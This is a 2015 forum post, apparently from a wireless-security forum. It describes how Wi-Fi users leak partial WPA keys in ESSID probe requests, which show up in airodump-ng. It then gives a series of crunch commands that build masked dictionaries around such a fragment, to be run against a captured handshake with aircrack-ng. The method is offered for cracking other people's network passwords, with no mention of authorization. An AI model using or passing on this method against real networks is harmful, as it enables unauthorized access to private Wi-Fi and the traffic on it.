Finding WPA Keys Broadcast In Clear

**mmusket33** · 2015-09-07

WPA Key Fragments Broadcast In Clear Text

WPA keys in clear text have taken another turn. Our Musket Team C Programmer has found cases where WPA key fragments(i.e. incomplete keys) are being broadcast in clear text. In this case the wifi user is inputting an incomplete WPA key in the ESSID block of the wifi software. When the key doesnot work the user makes another connection and does not remove the older version. The wifi device then probes using both the WPA key Fragment and the essid name.

These key fragments are easy to discover if they are less then 8 characters in length. However incomplete keys greater then 7 are more difficult to handle.

A rule of thumb in WPA brute force cracking is that 50% of the keys chosen by users are numeric strings 8 to 10 characters in length. And more then half of these numeric only keys are local telephone numbers.

You might see something like this in the airodump-ng probes:

1234567, Wifi Home

Hence ESSID probes shorter then 8 characters in length that appear to be key fragments might be attacked as follows.

Most WPA keys are numeric only, 8 to 10 characters in length. If you have elcomsoft and windows use the word attack and check combinations of the string. If not make a series of dictionary files and test it against a handshake.

For example if you see 1234567, Wifi Home in your probes run crunch

A simple approach here would be

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@ -o File88-01

crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" 1234567@@ -o File99-01

crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" 1234567@@@ -o File1010-01

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t @1234567 -o File88-02

crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" @@1234567 -o File99-02

crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" @@@1234567 -o File1010-02

A more complicated approach would be to work thru ALL the positions making small dictionaries

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@234567 -o File88c-01

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12@34567 -o File88c-02

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123@4567 -o File88c-03

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234@567 -o File88c-04

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12345@67 -o File88c-05

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123456@7 -o File88c-06

crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@2345678 -o File99c-06

etc etc etc

All variations are not shown here

Keys 8 or more in length that do not successfully crack the key thru tools like aircrack-ng might be WPA Key fragments. In such a case the more complicated approach must be employed

There is a significant social engineering component in successful brute forcing a WPA key. Even if your computer cracking speed is slow, running numeric keys 8 to 10 characters in length against a WPA handshake is possible. If you are given a part of the key the chances of cracking the WPA key increases.

Mteams are working on an expansion of ESSIDPROBE1-5 to construct these dictionaries automatically. In the meantime if you discover these WPA Fragments in clear text you can try the simple approach above - you might just get lucky.

Musket Teams

Thread: Finding WPA Keys Broadcast In Clear

Thread Tools

Search Thread

Display

Threaded View

Similar Threads

How to clear Terminal & Vim history

Arpspoof broadcast

problem wih clear command

Wireshark - only broadcast packets captured - run out of ideas!

Posting Permissions